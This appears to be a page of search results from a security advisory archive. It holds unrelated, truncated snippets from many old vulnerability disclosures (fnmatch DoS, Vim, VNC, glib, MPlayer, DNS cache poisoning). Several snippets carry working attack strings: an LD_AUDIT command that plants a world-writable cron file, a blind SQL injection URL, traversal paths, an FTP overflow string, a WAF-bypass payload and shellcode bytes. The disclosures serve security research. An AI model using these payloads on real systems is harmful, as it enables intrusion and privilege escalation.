Next Page >>
pattern
SYNOPSIS
#include <fnmatch.h>
int
fnmatch(const char *pattern, const char *string, int flags);
--- 1. Multiple Vendors libc/fnmatch(3) DoS (incl apache poc) ---
Attacker, what may modify first and second parameters(pattern,string) of fnmatch(3), may cause to CPU resource exhaustion. To see problem huge complexity, try compile code below:
!pvefindaddr findmsp :
Log data
0BADF00D -------------------------------------------------------------------------
0BADF00D Searching for metasploit pattern references
0BADF00D -------------------------------------------------------------------------
0BADF00D [1] Checking register addresses and contents
0BADF00D ============================================
0BADF00D Register EDI points to Metasploit pattern at position 0
0BADF00D Register EAX is overwritten with Metasploit pattern at position 4096
be executed under the following scenario:
1. The guest machine must be a Windows XP with SP2 or SP3.
2. The user running the PoC must have admin privileges.
The PoC code covers the whole kernel memory looking for a pattern of
code located in the network driver 'netvsc50.sys' on the guest machine.
The code is in the function 'PkSendPacketSimple' and it's a call to the
function 'memcpy'.
When that pattern is located in the driver code, the entry of the
--- 0.Description ---
#include <glob.h>
int glob(const char *pattern, int flags,
int (*errfunc)(const char *epath, int eerrno), glob_t *pglob);
Description
This function expands a filename wildcard which is passed as pattern.
- --- 1. RE_DUP_MAX overflow ---
The main problem exists in regcomp(3) function of GNU libc implementation. Let`s try understand..
- ---
int
regcomp (preg, pattern, cflags)
regex_t *__restrict preg;
const char *__restrict pattern;
int cflags;
{
- ---
- ---
...
* parsing and handling. There is broad potential for any given fnmatch(3)
* implementation to be buggy.
*
* Currently supported pattern(s):
* - any number of wildcards, "*" or "?"
* - {,} syntax (not nested)
...
- ---
This is the ``filetype.vim'' vulnerability, described in the sections
3.4.2.1. and 3.4.2.2. of the original advisory[1]. It can lead to
arbitrary code execution upon Vim opening a crafted file. The file can
be either local or remote, and the filename must match one of the
following glob patterns:
*.asm
*.s
*.S
*.a
queries to ns.victim.com for hosts in cache-poisoning.net zone.
Ns.victim.com will query the name server for cache-poisoning.net. The
attacker records the transaction IDs of the requests sent to the name
server of cache-poisoning.net by ns.victim.com.
Microsoft DNS transaction IDs follow a certain pattern. There seems to
be 8 independent counters that are randomly incremented. Each
transaction ID is taken from a randomly chosen counter. So, there are 8
sequences of randomly incrementing numbers. A sample of transaction IDs
below illustrates that:
--- sendump.c ---
/*
* sendump - FreeBSD-SA-05:02.sendfile exploit - 2005/04/16.
* Updated for FreeBSD 5.x, added alternate hash types, added optional
* relaxed pattern matching - 2005/04/21.
*
* This program is meant to be used in controlled environments only.
* If found in the wild, please return to ... wait, this is public now,
* and this program is hereby placed in the public domain. Feel free to
* reuse parts of the source code, etc.
. 'ClientConnection::ReadFailureReason() : 3066'
Other versions may be vulnerable too.
Multiple VNC clients are affected, as they share the vulnerable code.
The integer overflow follows this pattern:
/-----------
unsigned int len; /* note the *unsigned int* */
But you'd have no idea where to start or end the tracing. This, in
effect, gives unlimited possible combinations based on differing
starting and ending points of the same pattern.
Shannon Francis
IT Security Compliance Analyst
JetBlue Airways
8265 Hanger Blvd
Orlando, FL 32827
Tel: 407.375.0405
----------------------
A] directory traversal
----------------------
WebMod uses an anti-directory traversal check which searchs for any
"../" pattern in the HTTP request of the client.
So it's enough to use a "..\" pattern to bypass the check and being
able to download any file from the disk where Half-Life is running
included the configuration files of the game server (like
..\..\..\..\platform\config\server.vdf or ..\..\..\server.cfg).
Note that this bug works only on Windows servers.
# elevated privileges, as it creates the file specified in the output
# environment variable.
$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
ERROR: ld.so: object 'libpcprofile.so' cannot be loaded as audit interface: undefined symbol: la_version; ignored.
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
[-M mtu discovery hint] [-S sndbuf]
[ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
# This results in creating a world writable file in the crontab directory.
$ ls -l /etc/cron.d/exploit
Increments _EncryptionKeyCount by 0x100 and makes some 'calculations'
with the (current time.lowpart + _EncryptionKeyCount) resulting in a
DWORD value with the
following 'pattern':
where CT = (current time.lowpart + _EncryptionKeyCount)
seed = CT[1], CT[2]-1, CT[2], CT[1]+1;
#include <process.h>
/****************************************************************************/
unsigned int get_pop_pop_ret ( char );
int is_pattern ( unsigned char * , unsigned int , unsigned int * );
/****************************************************************************/
char get_code_address [] = ""
"\xe8\xff\xff\xff\xff\xf0" // "call $-1"
http://lcamtuf.coredump.cx/focus-webkit/
It's not very serious, but more cuter than clickjacking proper. WebKit
focus behavior on Windows makes this particular PoC easier there, but
I believe that no browser is designed to counter this general attack
pattern in any particular way. The usual opt-in mitigations
(X-Frame-Options, frame busting) should offer a reasonable degree of
protection already.
[1] http://code.google.com/p/browsersec/wiki/Part2#Arbitrary_page_mashups_%28UI_redressing%29
[2] http://lcamtuf.coredump.cx/focusbug/ and so forth
Hacking Printers for fun and profit
Andrei Constin
DarunGrim - A Tool for Binary Diffing and Automatic Vulnerabilities
Pattern Matching
Jeongwook (Matt) Oh
Immature Femtocels
Ravishankar Borgaonkar & Kevin Redon, Technical University of Berlin
5553 has_mbyte ? vim_iswordp(mb_prevptr(ml_get_curline(), ptr)) :
5554 #endif
5555 vim_iswordc(ptr[-1])))
5556 STRCAT(buf, "\\>");
5557 #ifdef FEAT_CMDHIST
5558 /* put pattern in search history */
5559 add_to_history(HIST_SEARCH, buf, TRUE, NUL);
5560 #endif
5561 normal_search(cap, cmdchar == '*' ? '/' : '?', buf, 0);
5562 }
5563 else
expect around 32768 connection-killing attempts before they are likely
to succeed. This level of disruption would certainly be noticed and it
is highly unlikely that any user would retry the connection enough times
for the attack to succeed.
The usage pattern where the attack is most likely to succeed is where an
automated connection is configured to retry indefinitely in the event of
errors. In this case, it might be possible to recover as much as 14 bits
of plaintext per hour (assuming a very fast 10 connections per second).
Implementing a limit on the number of connection retries (e.g. 256) is
sufficient to render the attack infeasible for this case.
#$ ./getpassword.sh
#74b444ff2785ea8bb9ae02c13b6a71f1
HOST="HOST"
TARGET_USER="0x61646d696e" #admin
PATTERN="Interval"
COOKIE="rq842tci6e5ib7t918c6sv1ml4"
CHARSET=(0 1 2 3 4 5 6 7 8 9 a b c d e f g h i j k l m n o p q r s t u v
w x y z)
GROUP_ID=2
An overlong string as DSC comment (more than 42000 bytes)
results in a direct EIP overwrite.
Exception is first-chance so the program will never crash.
At the moment of the redirection EAX and ESI are user-controlled.
This portion of the buffer begins with '%' (it is the next DSC
comment) but as you can see the resulting pattern is
nop-equivalent.
Tested and working against xp sp3
change the call esi if you need, must be alphabetic
I used a "call esi" from comctl32.dll on xp sp3,
and Daniel Austin.
-[ Collision Course
The main goal of “Collision Course” is to help people to understand and
evaluate the security approach some IPS/IDS still have: Pattern Matching.
But, after re-started the research I realized that it could be more than
just by-pass an IPS/IDS. Both NNG (Numb Next Generation) and ENG (Encore
Next Generation) are available @ PacketStorm16.
1. NNG:
http://www.packetstormsecurity.com/UNIX/IDS/nng-4.13r-public.rar
code execution when processing large strings. A number of other
GNOME-related applications which predate glib are vulnerable due to the
commonality of this flawed code.
In all cases, heap memory is allocated using a length calculated with a
user-supplied, platform-specifc value. It follows the pattern below:
g_malloc(user_supplied_length * 3 / 4 + some_small_num)
Due to the evaluation order of arithmetic operations, the length is
multiplied by 3 prior to division by 4. This will allow the calculated
Profense Web Application Firewall configured in positive model can be evaded.
Technical details:
Profense Web Application Firewall configured to make use of the strong positive model (white-list approach) can be evaded to launch various attacks including XSS (Cross-Site Scripting), SQL Injection, remote command execution, and others.
The vulnerability can be reproduced by making use of a URL-encoded new line character. The pattern matching in multi line mode matches any non-hostile line and marks the whole request as legitimate, thus allowing the request. This results in a bypass in the positive model. An example is showed below:
http://testcases/phptest/xss.php?var=%3CEvil%20script%20goes%20here%3E=%0AByPass
$res = mysql_query("SELECT COUNT(*) FROM torrents $where") or die(mysql_error());
-----------------------------[source code end]---------------------------------
This specific sql injection vulneraility can be exploited using blind attack
methods. If there is one or more active torrents in database, then usable is
attack pattern below:
http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>1,1,2)=(SELECT+1
and we see found torrents.
* MPlayer contains a stack buffer overflow vulnerability while parsing
malformed TwinVQ media files.
* TWIN constant expression for TWINVQ is always followed by 8 digits
version number
* COMM is the Standard Sub-chunk will fall after 4 byte size relative
to TWIN pattern.
* Data_size from DSIZ subchunk unsigned value is having vulnerability.
* In the malicious packet i analyze, The sub-chunk size is around 8191
bytes ( 0x 00 00 1f ff).
IV. DETECTION
iDefense has confirmed the existence of this vulnerability inside
Microsoft's ATL and MFC. Although later versions of the ATL/MFC are
less vulnerable, certain conditions can trigger the same exploit
pattern.
Any code compiled with these libraries may also be vulnerable. Specific
controls compiled with vulnerable versions include Adobe Flash and
Sun's Java plug-in.
no, MKDIR is *not* required, also write access is *not* required.
Assuming a directory with a name that starts with "A" exists and that is
at least 14 chars long, this pattern will trigger the overflow:
NLST [Ax206]*/../A*/../A*/../A*/../A*/../A*/../A*/../A*/\r\n
At least on win2k3. Therefore, the workarounds for kb975191 on
function is
called in body upload. The function is called in a suppressed manner and
kills the
parent window directly by default which makes it vulnerable to denial of
service attack.
This inability of Google Chrome diversifies the attack pattern as number
of events can
execute this function without a security check,prompting a user to
allow the event to trigger.
This security issue is a result of design flaw in the browser as
Florian Weimer wrote:
> * Theo de Raadt:
>> Management eventually has to decide to impact the SLA's of all domains.
>> That means that Sun's promise of isolation is bunk.
>
> I don't want to downplay your frustration, but the pattern is fairly
> common: When someone tries to port a new operating system to some
> partitioning system, it's not totally unheard of that the new code takes
> down (parts of) the sytem beyond the assigned partition.
Something that seems to be being missed is that it doesn't matter HOW the
Next Page>>
|
